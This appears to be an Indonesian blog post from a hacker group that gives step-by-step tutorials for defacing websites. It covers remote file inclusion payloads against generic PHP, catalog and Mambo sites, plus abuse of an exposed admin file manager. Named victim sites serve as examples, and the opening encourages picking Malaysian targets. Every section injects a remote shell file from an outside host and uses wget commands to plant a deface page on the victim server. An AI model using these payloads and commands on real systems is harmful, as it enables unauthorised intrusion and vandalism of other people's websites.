Disini kamu mesti usaha sendiri mencari targetnya (malingsia).
Langkah-langkah nya :
1. http://www.hilger-it.de/index.php?go=main.php
2. Kemudian hapus/delete main.php di url/browsing sehingga menjadi http://www.hilger-it.de/index.php?go=
3. Masukkan file inject ini di belakang situs tadi :
http://k.domaindlx.com/batamhacker/sql2.htm
Misal nya http://www.hilger-it.de/index.php?go...crew/sql2.htm?
4. Maka yang keluar di situs target adalah : /homepages/39/d143393561/htdocs/hilger
5. Masukkan file deface ini : http://k.domaindlx.com/batamhackercrew/jh.htm
6. Di kolom Execute Command ketik :
wget http://k.domaindlx.com/batamhackercrew/jh.htm
7. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya: http://www.hilger-it.de/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
================================================== ===
Deface situs Catalog PHP
1. http://www.rascom.at/catalog/product...be164a40e92dc8 atau http://www.rascom.at/catalog/default.php?cPath=2
2. Kemudian hapus/delete product_info.php?products_id=322&PHPSESSID=a7d2068 8baf4b05261be164a40e92dc8 di url/browsing sehingga menjadi http://www.rascom.at/catalog/
3. Masukkan bug ini di belakang situs tadi :
includes/include_once.php?include_file=
Misal nya http://www.rascom.at/catalog/include...?include_file=
4. Masukkan file inject ini di belakang nya lagi :
http://k.domaindlx.com/batamhackercrew/sql.htm
Misal nya http://www.rascom.at/catalog/include...rcrew/sql.htm?
5. Di kolom cmd ketik :
find / -perm 777 -type d atau find / -perm 755 -type d
Tunggu beberapa saat.......
6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.
Contoh Permision Denied :
find: /usr/share/ssl/CA: Keine Berechtigung
find: /var/empty/sshd: Keine Berechtigung
find: /var/spool/cups: Keine Berechtigung
Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.
Contoh folder yg bisa : /var/www/html/www.rascom.at/catalog/images
7. Masukkan file deface ini :
http://k.domaindlx.com/batamhackercrew/jh.htm
8. Di kolom cmd ketik :
cd /var/www/html/www.rascom.at/catalog/images;wget http://k.domaindlx.com/batamhackercrew/jh.htm
Tunggu beberapa saat.......
10:35:02 (4 KB/s) - `jh.htm' saved
Itu artinya sukses ke save
9. Cara lihat hasil nya :
http://www.rascom.at/catalog/images/[file deface tadi]
10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.rascom.at/catalog/images/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
================================================== ===
Deface situs cPath
1. http://www.new2u.us/index.php?cPath0
2. Kemudian hapus/delete index.php?cPath0 di url/browsing sehingga menjadi http://www.new2u.us
3. Masukkan bug ini di belakang situs tadi :
_admin_/file_manager.php atau admin/file_manager.php
Misal nya http://www.new2u.us/_admin_/file_manager.php
4. Skrg kamu udah masuk ke file server nya. Carilah file index.php trus klik file index.php tersebut.
5. Kemudian klik tab "Edit" di kolom yg sebelah kanan.
Hapus script yg ada di kolom tsb trus ketik Hacked by BatamHacker
Trus klik tab "Save".
6. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.new2u.us
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
================================================== ===
Deface situs Mambo
1. http://sukan.upm.edu.my/Buletin/inde...id=17&Itemid=2
2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?
3. Masukkan bug ini di belakang situs tadi :
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
Misal nya http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
4. Masukkan file inject ini di belakang nya lagi :
http://k.domaindlx.com/batamhackercrew/sql2.htm
Misal nya : http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/batamhackercrew/sql2.htm?
5. Di kolom Execute Command ketik :
find / -perm 777 -type d atau find / -perm 755 -type d
Tunggu beberapa saat.......
6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.
Contoh Permision Denied :
find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied
Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.
Contoh folder yg bisa : /opt/orion
7. Masukkan file deface ini :
http://k.domaindlx.com/batamhackercrew/jh.htm
8. Di kolom Execute Command ketik :
cd /opt/orion;wget http://k.domaindlx.com/batamhackercrew/jh.htm
Tunggu beberapa saat.......
10:35:02 (4 KB/s) - `jh.htm' saved
Itu artinya sukses ke save
9. Cara lihat hasil nya :
http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]
10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
================================================== ===
url yg diketik disini (disetiap bagian no 1) adalah sebagai contoh perumpamaan dan bukan untuk dibikin target, untuk targetnya cari sendiri
segitu dulu nanti yg lainnya nyusul di lain waktu.........
Tidak ada komentar:
Posting Komentar
Setelah membaca artikel di atas.
Apa komentar anda ??